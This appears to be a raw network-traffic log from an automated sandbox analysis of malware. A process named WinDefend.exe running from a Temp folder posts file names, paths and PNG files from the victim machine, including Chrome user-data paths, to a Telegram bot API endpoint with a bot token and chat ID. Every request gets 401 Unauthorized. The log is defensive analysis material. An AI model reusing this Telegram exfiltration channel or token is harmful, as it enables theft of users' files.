2024-05-23 13:35:29 UTC	214	OUT	Data Raw: d3 f4 0e 3c 72 04 e0 67 e6 78 2a 00 84 a1 a9 00 10 86 a6 02 40 18 9a 0a 00 61 68 2a 00 84 a1 a9 00 10 86 a6 02 40 18 9a 0a 00 61 68 2a 00 84 a1 a9 00 10 86 a6 02 40 18 9a 0a 00 61 68 2a 00 84 a1 a9 00 10 86 a6 02 40 18 9a 0a 00 61 68 2a 00 84 a1 a9 00 10 86 a6 02 40 18 9a 0a 00 61 68 2a 00 84 a1 a9 00 10 86 a6 02 40 18 9a 0a 00 61 68 2a 00 84 a1 a9 00 10 86 a6 02 40 18 9a 0a 00 61 68 2a 00 84 a1 a9 00 10 86 a6 02 40 18 9a 0a 00 61 68 2a 00 84 a1 a9 00 10 86 a6 02 40 18 9a 0a 00 61 68 2a 00 84 a1 a9 00 10 86 a6 02 40 18 9a 0a 00 61 68 2a 00 84 a1 a9 00 10 86 a6 02 40 18 ff 05 34 f3 d7 17 7c 2a b8 42 00 00 00 00 49 45 4e 44 ae 42 60 82 Data Ascii: <rgx@ah@ah@ah@ah@ah@ah@ah@ah@ah@ah@4\|BIENDB`
2024-05-23 13:35:29 UTC	131	OUT	Data Raw: 0d 0a 2d 2d 36 31 35 33 61 31 38 34 2d 31 37 30 35 2d 34 37 64 63 2d 61 33 34 32 2d 37 64 33 33 32 37 36 66 30 34 36 30 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 70 6c 61 69 6e 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 63 68 61 74 5f 69 64 0d 0a 0d 0a Data Ascii: --6153a184-1705-47dc-a342-7d33276f0460Content-Type: text/plain; charset=utf-8Content-Disposition: form-data; name=chat_id
2024-05-23 13:35:29 UTC	10	OUT	Data Raw: 31 36 35 35 32 34 30 39 36 37 Data Ascii: 1655240967
2024-05-23 13:35:29 UTC	405	IN	HTTP/1.1 401 Unauthorized Server: nginx/1.18.0 Date: Thu, 23 May 2024 13:35:29 GMT Content-Type: application/json Content-Length: 58 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection {"ok":false,"error_code":401,"description":"Unauthorized"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
179	192.168.2.5	61228	149.154.167.220	443	4768	C:\Users\user\AppData\Local\Temp\WinDefend.exe

Timestamp	Bytes transferred	Direction	Data
2024-05-23 13:35:29 UTC	196	OUT	POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendMessage HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: api.telegram.org Content-Length: 350 Expect: 100-continue
2024-05-23 13:35:30 UTC	25	IN	HTTP/1.1 100 Continue
2024-05-23 13:35:30 UTC	350	OUT	Data Raw: 63 68 61 74 5f 69 64 3d 31 36 35 35 32 34 30 39 36 37 26 74 65 78 74 3d 46 69 6c 65 25 33 41 2b 32 35 36 2e 70 6e 67 25 30 41 50 61 74 68 25 33 41 2b 43 25 33 41 25 35 43 44 6f 63 75 6d 65 6e 74 73 2b 61 6e 64 2b 53 65 74 74 69 6e 67 73 25 35 43 61 6c 66 6f 6e 73 25 35 43 41 70 70 44 61 74 61 25 35 43 4c 6f 63 61 6c 25 35 43 41 70 70 6c 69 63 61 74 69 6f 6e 2b 44 61 74 61 25 35 43 41 70 70 6c 69 63 61 74 69 6f 6e 2b 44 61 74 61 25 35 43 41 70 70 6c 69 63 61 74 69 6f 6e 2b 44 61 74 61 25 35 43 41 70 70 6c 69 63 61 74 69 6f 6e 2b 44 61 74 61 25 35 43 41 70 70 6c 69 63 61 74 69 6f 6e 2b 44 61 74 61 25 35 43 47 6f 6f 67 6c 65 25 35 43 43 68 72 6f 6d 65 25 35 43 55 73 65 72 2b 44 61 74 61 25 35 43 44 65 66 61 75 6c 74 25 35 43 57 65 62 2b 41 70 70 6c 69 63 61 Data Ascii: chat_id=1655240967&text=File%3A+256.png%0APath%3A+C%3A%5CDocuments+and+Settings%5Cuser%5CAppData%5CLocal%5CApplication+Data%5CApplication+Data%5CApplication+Data%5CApplication+Data%5CApplication+Data%5CGoogle%5CChrome%5CUser+Data%5CDefault%5CWeb+Applica
2024-05-23 13:35:30 UTC	405	IN	HTTP/1.1 401 Unauthorized Server: nginx/1.18.0 Date: Thu, 23 May 2024 13:35:30 GMT Content-Type: application/json Content-Length: 58 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection {"ok":false,"error_code":401,"description":"Unauthorized"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
180	192.168.2.5	61229	149.154.167.220	443	7572	C:\Users\user\AppData\Local\Temp\WinDefend.exe

Timestamp	Bytes transferred	Direction	Data
2024-05-23 13:35:29 UTC	233	OUT	POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendDocument HTTP/1.1 Content-Type: multipart/form-data; boundary="d58a9397-78c7-47f1-b524-cd869a6a615e" Host: api.telegram.org Content-Length: 3945 Expect: 100-continue
2024-05-23 13:35:30 UTC	25	IN	HTTP/1.1 100 Continue
2024-05-23 13:35:30 UTC	40	OUT	Data Raw: 2d 2d 64 35 38 61 39 33 39 37 2d 37 38 63 37 2d 34 37 66 31 2d 62 35 32 34 2d 63 64 38 36 39 61 36 61 36 31 35 65 0d 0a Data Ascii: --d58a9397-78c7-47f1-b524-cd869a6a615e
2024-05-23 13:35:30 UTC	125	OUT	Data Raw: 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 64 6f 63 75 6d 65 6e 74 3b 20 66 69 6c 65 6e 61 6d 65 3d 73 65 6c 65 63 74 69 6f 6e 2d 61 63 74 69 6f 6e 73 32 78 2e 70 6e 67 3b 20 66 69 6c 65 6e 61 6d 65 2a 3d 75 74 66 2d 38 27 27 73 65 6c 65 63 74 69 6f 6e 2d 61 63 74 69 6f 6e 73 32 78 2e 70 6e 67 0d 0a 0d 0a Data Ascii: Content-Disposition: form-data; name=document; filename=selection-actions2x.png; filename*=utf-8''selection-actions2x.png
2024-05-23 13:35:30 UTC	3595	OUT	Data Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 50 00 00 08 98 08 03 00 00 00 77 9b d0 21 00 00 00 03 73 42 49 54 08 08 08 db e1 4f e0 00 00 00 72 50 4c 54 45 ff ff ff 7e 7e 7e 78 78 78 7e 7e 7e 78 78 78 7e 7e 7e 78 78 78 7e 7e 7e 7c 7c 7c 78 78 78 7c 7c 7c 78 78 78 78 78 78 7a 7a 7a 7a 7a 7a 78 78 78 78 78 78 78 78 78 78 78 78 78 78 78 7c 7c 7c 78 78 78 f6 f6 f6 ed ed ed e4 e4 e4 db db db d2 d2 d2 c9 c9 c9 c0 c0 c0 b8 b8 b8 af af af a6 a6 a6 9d 9d 9d 94 94 94 8b 8b 8b 82 82 82 7c 7c 7c 78 78 78 0e 0e f5 cf 00 00 00 26 74 52 4e 53 00 11 11 22 22 33 33 44 44 44 55 55 66 77 88 99 aa bb cc dd ee ee ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff b6 39 f7 7b 00 00 00 09 70 48 59 73 00 00 0b 12 00 00 0b 12 01 d2 dd 7e fc 00 00 00 15 74 45 58 74 43 72 Data Ascii: PNGIHDRPw!sBITOrPLTE~~~xxx~~~xxx~~~xxx~~~\|\|\|xxx\|\|\|xxxxxxzzzzzzxxxxxxxxxxxxxxx\|\|\|xxx\|\|\|xxx&tRNS""33DDDUUfw9{pHYs~tEXtCr
2024-05-23 13:35:30 UTC	131	OUT	Data Raw: 0d 0a 2d 2d 64 35 38 61 39 33 39 37 2d 37 38 63 37 2d 34 37 66 31 2d 62 35 32 34 2d 63 64 38 36 39 61 36 61 36 31 35 65 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 70 6c 61 69 6e 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 63 68 61 74 5f 69 64 0d 0a 0d 0a Data Ascii: --d58a9397-78c7-47f1-b524-cd869a6a615eContent-Type: text/plain; charset=utf-8Content-Disposition: form-data; name=chat_id
2024-05-23 13:35:30 UTC	10	OUT	Data Raw: 31 36 35 35 32 34 30 39 36 37 Data Ascii: 1655240967
2024-05-23 13:35:30 UTC	44	OUT	Data Raw: 0d 0a 2d 2d 64 35 38 61 39 33 39 37 2d 37 38 63 37 2d 34 37 66 31 2d 62 35 32 34 2d 63 64 38 36 39 61 36 61 36 31 35 65 2d 2d 0d 0a Data Ascii: --d58a9397-78c7-47f1-b524-cd869a6a615e--
2024-05-23 13:35:30 UTC	405	IN	HTTP/1.1 401 Unauthorized Server: nginx/1.18.0 Date: Thu, 23 May 2024 13:35:30 GMT Content-Type: application/json Content-Length: 58 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection {"ok":false,"error_code":401,"description":"Unauthorized"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
181	192.168.2.5	61230	149.154.167.220	443	2132	C:\Users\user\AppData\Local\Temp\WinDefend.exe

Timestamp	Bytes transferred	Direction	Data
2024-05-23 13:35:30 UTC	196	OUT	POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendMessage HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: api.telegram.org Content-Length: 257 Expect: 100-continue
2024-05-23 13:35:30 UTC	25	IN	HTTP/1.1 100 Continue
2024-05-23 13:35:30 UTC	257	OUT	Data Raw: 63 68 61 74 5f 69 64 3d 31 36 35 35 32 34 30 39 36 37 26 74 65 78 74 3d 46 69 6c 65 25 33 41 2b 36 62 62 30 39 38 36 39 61 36 63 66 65 32 61 38 38 61 61 65 36 38 32 35 36 64 39 34 35 36 65 33 2e 70 6e 67 25 30 41 50 61 74 68 25 33 41 2b 43 25 33 41 25 35 43 50 72 6f 67 72 61 6d 2b 46 69 6c 65 73 25 35 43 41 64 6f 62 65 25 35 43 41 63 72 6f 62 61 74 2b 44 43 25 35 43 41 63 72 6f 62 61 74 25 35 43 57 65 62 52 65 73 6f 75 72 63 65 73 25 35 43 52 65 73 6f 75 72 63 65 30 25 35 43 61 70 70 31 25 35 43 64 63 2d 64 65 73 6b 74 6f 70 2d 61 70 70 2d 64 72 6f 70 69 6e 25 35 43 31 2e 30 2e 30 5f 31 2e 30 2e 30 25 35 43 36 62 62 30 39 38 36 39 61 36 63 66 65 32 61 38 38 61 61 65 36 38 32 35 36 64 39 34 35 36 65 33 2e 70 6e 67 25 30 41 53 69 7a 65 25 33 41 2b 31 30 2b Data Ascii: chat_id=1655240967&text=File%3A+6bb09869a6cfe2a88aae68256d9456e3.png%0APath%3A+C%3A%5CProgram+Files%5CAdobe%5CAcrobat+DC%5CAcrobat%5CWebResources%5CResource0%5Capp1%5Cdc-desktop-app-dropin%5C1.0.0_1.0.0%5C6bb09869a6cfe2a88aae68256d9456e3.png%0ASize%3A+10+
2024-05-23 13:35:31 UTC	405	IN	HTTP/1.1 401 Unauthorized Server: nginx/1.18.0 Date: Thu, 23 May 2024 13:35:31 GMT Content-Type: application/json Content-Length: 58 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection {"ok":false,"error_code":401,"description":"Unauthorized"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
182	192.168.2.5	61231	149.154.167.220	443	4768	C:\Users\user\AppData\Local\Temp\WinDefend.exe

Timestamp	Bytes transferred	Direction	Data
2024-05-23 13:35:31 UTC	234	OUT	POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendDocument HTTP/1.1 Content-Type: multipart/form-data; boundary="f989388b-1d51-4be8-8519-d5a9f1690fe8" Host: api.telegram.org Content-Length: 12549 Expect: 100-continue
2024-05-23 13:35:31 UTC	25	IN	HTTP/1.1 100 Continue
2024-05-23 13:35:31 UTC	40	OUT	Data Raw: 2d 2d 66 39 38 39 33 38 38 62 2d 31 64 35 31 2d 34 62 65 38 2d 38 35 31 39 2d 64 35 61 39 66 31 36 39 30 66 65 38 0d 0a Data Ascii: --f989388b-1d51-4be8-8519-d5a9f1690fe8
2024-05-23 13:35:31 UTC	93	OUT	Data Raw: 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 64 6f 63 75 6d 65 6e 74 3b 20 66 69 6c 65 6e 61 6d 65 3d 32 35 36 2e 70 6e 67 3b 20 66 69 6c 65 6e 61 6d 65 2a 3d 75 74 66 2d 38 27 27 32 35 36 2e 70 6e 67 0d 0a 0d 0a Data Ascii: Content-Disposition: form-data; name=document; filename=256.png; filename*=utf-8''256.png
2024-05-23 13:35:31 UTC	4096	OUT	Data Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 01 00 00 00 01 00 08 06 00 00 00 5c 72 a8 66 00 00 20 00 49 44 41 54 78 9c ed dd 79 9c 5c 57 75 e0 f1 df b9 f7 bd 5a 7a d1 66 49 d6 66 cb 06 d9 18 d9 c8 4b 0b 1b 8c 01 c9 04 27 01 06 b2 d9 03 61 49 18 82 13 32 9f f9 84 21 21 19 32 33 d0 ce 36 03 93 90 21 30 c3 84 4c 02 84 c5 20 03 19 c0 6c 01 a3 f6 8e c1 b2 8d b1 04 b6 05 b6 6c 21 4b d6 de ad 5e aa de bb f7 cc 1f af aa bb 24 4b ee 56 2f ea 6e f5 f9 f2 01 c9 a6 ab ea 75 55 dd f3 ee 3d f7 9c f7 c0 18 63 8c 31 c6 18 63 8c 31 c6 18 63 8c 31 c6 18 63 8c 31 c6 18 63 8c 31 c6 18 63 8c 31 c6 18 63 8c 31 c6 18 63 8c 31 c6 18 63 8c 31 c6 18 63 8c 31 c6 18 63 8c 31 c6 18 63 8c 31 c6 18 63 8c 31 c6 18 63 8c 31 c6 18 63 8c 31 c6 18 63 8c 31 c6 18 63 8c 31 cf 24 d3 Data Ascii: PNGIHDR\rf IDATxy\WuZzfIfK'aI2!!236!0L ll!K^$KV/nuU=c1c1c1c1c1c1c1c1c1c1c1c1c1c1c1c1c1$
2024-05-23 13:35:31 UTC	4096	OUT	Data Raw: a9 60 bd 04 c7 b5 09 bc 76 91 0a e4 4f be 78 55 75 ef d5 97 bd dd 89 7c a0 24 ee 35 23 b5 fc cc c1 5a fe e9 33 67 ce 3a d3 c2 7a 09 80 63 6a f9 b7 10 7e fe 92 75 cf 4b 4b e9 af 81 fc 76 67 e2 cf 1f 0a 91 23 b9 0e 09 94 ad 96 ff d4 1a 35 00 f4 8d 5c 28 5d 69 de 73 ac d9 7e 3c bb 2e a1 3a 7d e6 78 2f 41 33 90 dd db d5 95 ae 68 d7 35 69 e2 fe 54 e1 8d 0a d2 17 62 4e 11 1f 2b c3 77 79 3e 4d ae 38 35 d5 5a 6e 55 5a bc 69 c5 75 7a 8b 3d 68 80 a7 26 f9 7a 00 f1 f4 9d 9d 9e 72 73 a4 97 60 b8 0c 5a c1 af 9c a7 bf 9a 24 ee 73 25 ef ae 63 f8 9a d2 6a b5 fc 93 28 e8 c9 9d 3d 46 7d e3 3b 1b 27 f8 4a ed 70 d2 99 f7 0b e2 34 ba 34 a2 2a 0e b4 b8 44 b0 19 d5 1c ea 25 50 90 7b bb 48 69 d4 f2 ef bd ea e2 f3 f7 5f bd fe 86 92 f3 ef 6d f3 7e 9d 40 89 e1 5a 7e 8e a9 e5 17 ec Data Ascii: `vOxUu\|$5#Z3g:zcj~uKKvg#5\(]is~<.:}x/A3h5iTbN+wy>M85ZnUZiuz=h&zrs`Z$s%cj(=F};'Jp44*D%P{Hi_m~@Z~
2024-05-23 13:35:31 UTC	4039	OUT	Data Raw: 0d 2f c1 96 03 b3 55 eb e7 a7 3a 7c 39 a9 79 49 5a 72 9a 1d d9 13 79 f4 93 d9 9a c5 5f 1b 58 91 1e ce ab 2c 4e 07 13 15 08 33 fd e9 55 00 00 0f 82 49 44 41 54 88 c6 e2 41 33 be 96 7f a2 4e e3 25 40 a3 2a a3 a8 1e 54 11 27 c1 25 1a 44 74 c1 c0 a1 ba eb 98 b7 e4 d6 8b 7e 67 de 93 1d e7 ff 5d 5b ed e0 97 71 7e 08 34 11 a5 a8 23 6e bd 0e 7e f3 ba f8 66 76 38 f6 3e 06 8d cf ce 21 4e 14 c9 60 a0 92 65 37 6d 9b 57 79 ff 57 e3 59 6d e2 2a 0b 16 27 83 21 47 34 c7 8d 5c 3c f1 14 5c 97 7f ba 9d ce 01 e0 b8 14 c8 24 89 a9 83 20 d4 3e 7c e1 7f fa 0a 4f 1e 78 e7 81 a0 1f 57 08 4e 04 41 02 8d 9b 64 9a d9 4f 21 88 48 74 22 a0 72 e8 90 ea 07 d9 bd ff 8f fe ba ab 7c 87 26 d4 bd 08 39 12 4f f7 f5 fe f1 cc 95 00 20 4a 33 91 ab a2 ce a9 a0 9a e4 59 bc 29 3d bf 26 3b 07 7f 7e Data Ascii: /U:\|9yIZry_X,N3UIDATA3N%@T'%Dt~g][q~4#n~fv8>!N`e7mWyWYm'!G4\<\$ >\|OxWNAdO!Ht"r\|&9O J3Y)=&;~
2024-05-23 13:35:31 UTC	131	OUT	Data Raw: 0d 0a 2d 2d 66 39 38 39 33 38 38 62 2d 31 64 35 31 2d 34 62 65 38 2d 38 35 31 39 2d 64 35 61 39 66 31 36 39 30 66 65 38 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 70 6c 61 69 6e 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 63 68 61 74 5f 69 64 0d 0a 0d 0a Data Ascii: --f989388b-1d51-4be8-8519-d5a9f1690fe8Content-Type: text/plain; charset=utf-8Content-Disposition: form-data; name=chat_id
2024-05-23 13:35:31 UTC	10	OUT	Data Raw: 31 36 35 35 32 34 30 39 36 37 Data Ascii: 1655240967
2024-05-23 13:35:31 UTC	44	OUT	Data Raw: 0d 0a 2d 2d 66 39 38 39 33 38 38 62 2d 31 64 35 31 2d 34 62 65 38 2d 38 35 31 39 2d 64 35 61 39 66 31 36 39 30 66 65 38 2d 2d 0d 0a Data Ascii: --f989388b-1d51-4be8-8519-d5a9f1690fe8--
2024-05-23 13:35:31 UTC	405	IN	HTTP/1.1 401 Unauthorized Server: nginx/1.18.0 Date: Thu, 23 May 2024 13:35:31 GMT Content-Type: application/json Content-Length: 58 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection {"ok":false,"error_code":401,"description":"Unauthorized"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
183	192.168.2.5	61232	149.154.167.220	443	7572	C:\Users\user\AppData\Local\Temp\WinDefend.exe

Timestamp	Bytes transferred	Direction	Data
2024-05-23 13:35:31 UTC	196	OUT	POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendMessage HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: api.telegram.org Content-Length: 183 Expect: 100-continue
2024-05-23 13:35:31 UTC	25	IN	HTTP/1.1 100 Continue
2024-05-23 13:35:31 UTC	183	OUT	Data Raw: 63 68 61 74 5f 69 64 3d 31 36 35 35 32 34 30 39 36 37 26 74 65 78 74 3d 46 69 6c 65 25 33 41 2b 53 5f 53 74 61 72 5f 31 34 2e 70 6e 67 25 30 41 50 61 74 68 25 33 41 2b 43 25 33 41 25 35 43 50 72 6f 67 72 61 6d 2b 46 69 6c 65 73 25 35 43 41 64 6f 62 65 25 35 43 41 63 72 6f 62 61 74 2b 44 43 25 35 43 41 63 72 6f 62 61 74 25 35 43 57 65 62 52 65 73 6f 75 72 63 65 73 25 35 43 52 65 73 6f 75 72 63 65 30 25 35 43 73 74 61 74 69 63 25 35 43 69 6d 61 67 65 73 25 35 43 53 5f 53 74 61 72 5f 31 34 2e 70 6e 67 25 30 41 53 69 7a 65 25 33 41 2b 31 2b 4b 42 Data Ascii: chat_id=1655240967&text=File%3A+S_Star_14.png%0APath%3A+C%3A%5CProgram+Files%5CAdobe%5CAcrobat+DC%5CAcrobat%5CWebResources%5CResource0%5Cstatic%5Cimages%5CS_Star_14.png%0ASize%3A+1+KB
2024-05-23 13:35:31 UTC	405	IN	HTTP/1.1 401 Unauthorized Server: nginx/1.18.0 Date: Thu, 23 May 2024 13:35:31 GMT Content-Type: application/json Content-Length: 58 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection {"ok":false,"error_code":401,"description":"Unauthorized"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
184	192.168.2.5	61233	149.154.167.220	443	2132	C:\Users\user\AppData\Local\Temp\WinDefend.exe

Timestamp	Bytes transferred	Direction	Data
2024-05-23 13:35:31 UTC	234	OUT	POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendDocument HTTP/1.1 Content-Type: multipart/form-data; boundary="1fb52e84-5eac-46c8-8822-224616eaa930" Host: api.telegram.org Content-Length: 10638 Expect: 100-continue
2024-05-23 13:35:32 UTC	25	IN	HTTP/1.1 100 Continue
2024-05-23 13:35:32 UTC	40	OUT	Data Raw: 2d 2d 31 66 62 35 32 65 38 34 2d 35 65 61 63 2d 34 36 63 38 2d 38 38 32 32 2d 32 32 34 36 31 36 65 61 61 39 33 30 0d 0a Data Ascii: --1fb52e84-5eac-46c8-8822-224616eaa930
2024-05-23 13:35:32 UTC	151	OUT	Data Raw: 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 64 6f 63 75 6d 65 6e 74 3b 20 66 69 6c 65 6e 61 6d 65 3d 36 62 62 30 39 38 36 39 61 36 63 66 65 32 61 38 38 61 61 65 36 38 32 35 36 64 39 34 35 36 65 33 2e 70 6e 67 3b 20 66 69 6c 65 6e 61 6d 65 2a 3d 75 74 66 2d 38 27 27 36 62 62 30 39 38 36 39 61 36 63 66 65 32 61 38 38 61 61 65 36 38 32 35 36 64 39 34 35 36 65 33 2e 70 6e 67 0d 0a 0d 0a Data Ascii: Content-Disposition: form-data; name=document; filename=6bb09869a6cfe2a88aae68256d9456e3.png; filename*=utf-8''6bb09869a6cfe2a88aae68256d9456e3.png
2024-05-23 13:35:32 UTC	4096	OUT	Data Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 01 a6 00 00 00 2f 08 02 00 00 00 27 db f9 f0 00 00 27 dd 49 44 41 54 78 da ed 9d 87 57 63 d9 9d e7 e7 0f d8 dd 73 c6 b3 b3 de b3 bb e3 75 6a f7 4c cf ba 3d eb 19 a7 d9 f1 78 c6 e3 76 9a f5 69 f7 da ed d4 c1 9d bb 2b 47 a8 2a a0 8a aa 22 e7 a8 80 40 08 90 40 80 c8 22 aa 00 91 73 4e 42 28 22 90 00 25 24 81 72 60 bf d2 a3 28 91 a9 76 d1 55 6d bf df b9 c5 51 bd 77 df bd bf fb de bd 9f f7 fd bd 77 df 7b 7f 76 97 34 d2 48 23 ed 4f c6 fe 0c ff 28 dc 96 fc 4a e1 40 47 ff 60 47 ff c0 27 9f 84 7d 83 bd 03 43 a4 91 46 1a 69 a7 66 03 03 03 9d 9d 9d db c8 63 f0 84 c5 f5 43 53 9d e3 d3 9d e3 53 9f 7c 12 8e cf 0c 4f cf 91 46 1a 69 a4 9d 9a 89 44 a2 91 91 91 6d e4 31 b9 5d 25 dc 21 7d bc d4 10 2f d5 7f e2 49 17 29 b6 Data Ascii: PNGIHDR/''IDATxWcsujL=xvi+G*"@@"sNB("%$r`(vUmQww{v4H#O(J@G`G'}CFifcCSS\|OFiDm1]%!}/I)
2024-05-23 13:35:32 UTC	4096	OUT	Data Raw: 6a 5a 31 a6 54 29 8a 96 bd 3b a0 e6 f1 15 6f 50 c5 6f b0 a5 77 05 cb 17 ab f4 fe 35 3e ef 82 78 f5 2a 55 fc 8b dc 85 db cd 8b 67 cb 56 ea 14 fb 91 e7 99 18 5b 4d a9 d1 ab 82 42 b9 d2 5a f9 6b 14 f1 6f 0b a5 0c 89 c7 eb 72 b7 75 a9 c2 3a 4d 36 bf 38 32 26 b7 af 72 07 34 99 dc a9 af 45 0f ff 38 65 e0 ae 60 ae 67 68 a8 85 5f f1 e8 ed 2f 59 9f c7 7e 28 2e 2e ee e8 e8 40 78 8b 43 86 86 3f 16 f2 f6 9c 44 b1 ed ec ec 2c 7a 1d 32 3b 9d 4e 04 cb c7 a9 3c cf fa 5c 3d a3 7e de a4 95 b5 97 d0 1b e6 37 77 e2 d6 c9 96 32 7a 62 2a c6 57 45 7d 4d 6e 61 b7 ca 2f 65 7c eb aa 7e 6e aa ff b1 bc 62 1e 9b 55 dc 22 1c 3d 10 79 12 ff e5 66 e9 78 6f 53 75 43 4b 2d 23 39 31 91 dd 2a d6 c8 46 aa d9 d9 89 69 d9 f4 06 91 35 70 41 c0 b5 be d0 55 9a 9a 9e 91 9e 92 5d d6 3e ad 0d 74 36 Data Ascii: jZ1T);oPow5>xUgV[MBZkoru:M682&r4E8e`gh_/Y~(..@xC?D,z2;N<\=~7w2zbWE}Mna/e\|~nbU"=yfxoSuCK-#91*Fi5pAU]>t6
2024-05-23 13:35:32 UTC	2070	OUT	Data Raw: 20 b8 a3 a3 a3 a1 28 51 97 f5 c2 fe 57 84 ae 0a a2 b4 6a 05 31 15 d9 6c 75 8e 28 37 da 44 26 a1 d8 4c a4 76 b1 79 6a d9 ea f2 7c 1a 5e 2d e7 da 70 8f 52 1d 79 2f ee 7d 45 28 e3 7f 77 55 d3 58 2c 56 72 72 32 31 4d e7 e4 53 91 47 46 46 90 ff d2 a5 4b 97 4f 6c c8 1c 1e 1e fe a4 26 c0 7f 02 c1 80 41 31 37 36 38 30 30 38 38 32 3e b3 e6 7c 02 25 3e e6 03 67 8e c0 03 67 6a bb 7b d9 ee ff 4b a4 25 bb cf ee dd 56 79 f7 02 93 54 4a d5 96 aa 95 3d c9 48 51 f8 a7 e6 91 c8 3b 65 83 2e d8 79 2b 32 71 35 07 21 52 6d 6d 2d 86 10 31 0b 1f b1 2d 95 4a 7d ba bc 23 90 87 78 0d 2c 5b 5e 5e 86 9c 81 4e 29 66 66 4f 65 fc db 01 2f 82 a7 3f 6f 6c 0a 31 2c 4e 6e 6c 6c 04 7f 14 f1 53 a3 ec cc 8b ae ee fb 76 c6 df ec 6f 9a ba f8 d7 8d d5 c5 f9 f9 f9 e0 1d f1 e4 49 52 52 d2 c9 1f 38 Data Ascii: (QWj1lu(7D&Lvyj\|^-pRy/}E(wUX,Vrr21MSGFFKOl&A176800882>\|%>ggj{K%VyTJ=HQ;e.y+2q5!Rmm-1-J}#x,[^^N)ffOe/?ol1,NnllSvoIRR8
2024-05-23 13:35:32 UTC	131	OUT	Data Raw: 0d 0a 2d 2d 31 66 62 35 32 65 38 34 2d 35 65 61 63 2d 34 36 63 38 2d 38 38 32 32 2d 32 32 34 36 31 36 65 61 61 39 33 30 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 70 6c 61 69 6e 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 63 68 61 74 5f 69 64 0d 0a 0d 0a Data Ascii: --1fb52e84-5eac-46c8-8822-224616eaa930Content-Type: text/plain; charset=utf-8Content-Disposition: form-data; name=chat_id
2024-05-23 13:35:32 UTC	10	OUT	Data Raw: 31 36 35 35 32 34 30 39 36 37 Data Ascii: 1655240967
2024-05-23 13:35:32 UTC	44	OUT	Data Raw: 0d 0a 2d 2d 31 66 62 35 32 65 38 34 2d 35 65 61 63 2d 34 36 63 38 2d 38 38 32 32 2d 32 32 34 36 31 36 65 61 61 39 33 30 2d 2d 0d 0a Data Ascii: --1fb52e84-5eac-46c8-8822-224616eaa930--
